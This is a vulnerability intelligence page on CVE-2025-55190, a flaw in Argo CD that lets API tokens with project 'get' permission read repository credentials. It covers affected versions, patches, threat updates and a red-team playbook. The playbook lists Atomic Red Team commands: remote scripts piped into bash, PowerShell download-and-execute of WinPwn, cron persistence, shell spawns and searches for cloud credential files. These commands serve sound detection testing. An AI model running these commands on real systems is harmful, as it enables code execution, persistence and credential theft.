CVE-2025-55190
Overview
This vulnerability is an unauthorized data exposure issue arising from improper access control in Argo CD's project details API endpoint. The root cause is that API tokens with project-level 'get' permissions can access sensitive repository credentials without explicit secret access rights. The affected component is the project details API within Argo CD versions 2.13.0 to 2.13.8, 2.14.0 to 2.14.15, 3.0.0 to 3.0.12, and 3.1.0-rc1 to 3.1.1.
Vulnerability Description
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. In versions 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12 and 3.1.0-rc1 through 3.1.1, API tokens with project-level permissions are able to retrieve sensitive repository credentials (usernames, passwords) through the project details API endpoint, even when the token only has standard application management permissions and no explicit access to secrets. This vulnerability does not only affect project-level permissions. Any token with project get permissions is also vulnerable, including global permissions such as: `p, role/user, projects, get, *, allow`. This issue is fixed in versions 2.13.9, 2.14.16, 3.0.14 and 3.1.2.
Impact
An attacker with an API token granting project-level 'get' permissions can extract sensitive repository credentials, including usernames and passwords, from the project details API. This requires authentication with a token that has at least project 'get' permissions, which may be granted to users or roles with limited privileges. Exploitation enables unauthorized access to repository secrets, potentially leading to further compromise of source code repositories or deployment pipelines. The CVSS vector indicates network attack complexity is low, with privileges required but no user interaction, and full confidentiality, integrity, and availability impact.
Solution
Upgrade Argo CD to fixed versions: 2.13.9, 2.14.16, 3.0.14, or 3.1.2 as detailed in the GitHub security advisory GHSA-786q-9hcg-v9ff. The vendor's advisory and patch commit (https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8) provide instructions to apply the fix. No alternative workarounds are specified; timely patching is recommended to remediate the improper permission enforcement in the project details API.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Argo CD arises from a flaw in the project details API endpoint, which allows API tokens with project-level permissions to access sensitive repository credentials, including usernames and passwords. This issue is particularly concerning as it enables tokens that should only have application management permissions to retrieve sensitive information without explicit access rights to secrets. The vulnerability affects multiple versions of Argo CD, specifically those ranging from 2.13.0 to 2.13.8, 2.14.0 to 2.14.15, 3.0.0 to 3.0.12, and 3.1.0-rc1 to 3.1.1. The flaw is exacerbated by the fact that any token with project get permissions, including those with global permissions, is also susceptible, thereby broadening the attack surface significantly.
Attack vectors for exploiting this vulnerability are varied and can be executed by any user or service that possesses the affected API tokens. An attacker could leverage a compromised token to query the project details API, thereby obtaining sensitive repository credentials. This could occur in scenarios where an organization has not implemented strict access controls or where API tokens are inadequately managed. For instance, if a developer inadvertently shares their API token or if it is stored insecurely, an attacker could easily exploit this vulnerability to gain unauthorized access to sensitive data. Furthermore, the potential for lateral movement within the organization’s infrastructure increases, as attackers could use the retrieved credentials to access other systems or repositories.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on Argo CD for continuous delivery in Kubernetes environments. The exposure of sensitive repository credentials can lead to unauthorized access to source code, configuration files, and other critical assets. This not only poses a risk to intellectual property but also increases the likelihood of data breaches, which can result in significant financial losses, reputational damage, and regulatory penalties. The business risk is amplified in industries that are subject to stringent compliance requirements, as the unauthorized disclosure of sensitive information could lead to severe legal ramifications.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, they should ensure that they are running the latest patched versions of Argo CD, as the vulnerability has been addressed in subsequent releases. Regularly auditing API tokens and implementing the principle of least privilege can significantly reduce the risk of exploitation. Organizations should also consider employing monitoring tools that can detect unusual API access patterns or unauthorized attempts to retrieve sensitive information. Additionally, implementing robust logging and alerting mechanisms can help in identifying potential breaches early, allowing for a swift response to any incidents.
In conclusion, the vulnerability in Argo CD presents a serious threat to organizations utilizing this tool for their Kubernetes deployments. The ability for API tokens with limited permissions to access sensitive repository credentials underscores the importance of stringent access controls and vigilant monitoring. By adopting proactive detection and mitigation strategies, organizations can safeguard their assets and reduce the risk associated with this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2025-55190, reflecting a growing likelihood of exploitation attempts targeting Argo CD deployments. Although no new exploit techniques or proof-of-concept code have surfaced, the upward trend in EPSS—now approaching the 90th percentile—indicates heightened attacker interest and potential preparatory activity. This shift suggests that threat actors may be prioritizing this vulnerability as a vector for unauthorized access to sensitive repository credentials, which could facilitate broader compromise within Kubernetes environments. For defenders, this evolving risk profile underscores the urgency of continuous monitoring and reassessment of access controls around Argo CD projects. The increased EPSS score elevates the threat level from a theoretical risk to a more imminent operational concern, warranting enhanced vigilance despite the absence of confirmed exploitation campaigns at this time.
Update 2 — May 18, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-55190, with new telemetry indicating increased attempts to leverage this vulnerability for unauthorized access to sensitive repository credentials within Kubernetes environments. Although no novel exploit techniques or proof-of-concept code have surfaced, the rise in observed activity suggests that threat actors are actively probing or exploiting this weakness, elevating it from a primarily theoretical concern to a more immediate operational threat. This shift underscores a growing adversary focus on compromising Argo CD deployments to gain broader footholds in cloud-native infrastructures. Consequently, the overall risk posture has intensified, warranting heightened monitoring and reassessment of access controls despite the absence of confirmed widespread exploitation campaigns at this time.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in probing activity targeting the CVE-2025-55190 vulnerability in Argo CD. While no new exploit code has been publicly disclosed, our telemetry indicates adversaries are increasingly engaging in reconnaissance efforts against affected deployments, suggesting a shift toward active exploitation attempts. This intensification in hostile activity elevates the operational risk, as threat actors may leverage exposed repository credentials to pivot within Kubernetes environments, potentially compromising broader cloud-native infrastructure. The persistence of this vulnerability in widely deployed versions, combined with the rising adversary focus, underscores an urgent need for defenders to reassess detection capabilities and access governance. Although the EPSS score remains stable, the qualitative surge in observed activity signals that the threat landscape is becoming more dynamic and adversaries are prioritizing this vector for initial access or lateral movement.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Argoproj | Argo Cd | All |
cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
|
|
|
Argoproj | Argo Cd | All |
cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
|
|
|
Argoproj | Argo Cd | All |
cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
|
|
|
Argoproj | Argo Cd | All |
cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-55190 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8 |